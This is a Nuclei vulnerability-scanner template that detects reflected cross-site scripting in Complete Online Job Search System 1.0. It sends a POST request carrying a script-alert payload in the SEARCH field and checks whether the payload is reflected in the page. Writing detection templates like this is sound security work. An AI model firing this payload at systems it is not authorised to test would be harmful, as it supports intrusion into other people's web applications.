nuclei-templates/http/vulnerabilities/other/eris-xss.yaml

id: eris-xss

info:
  name: Complete Online Job Search System 1.0 - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.    
  reference:
    - https://github.com/debug601/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-9.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2022,xss,eris

http:
  - raw:
      - |
        POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit        

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Result : <script>alert(document.domain)</script>'
          - 'ERIS'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 490a0046304402204e60ae6a03671e42f51702a1b5ba53524fd4cafc2795ab4d8b3466fba84cfc190220115ce8af70888a3c413a9dc34991c60454236d3e686d67fa1b6e74c610ea5753:922c64590222798bb761d5b6d8e72950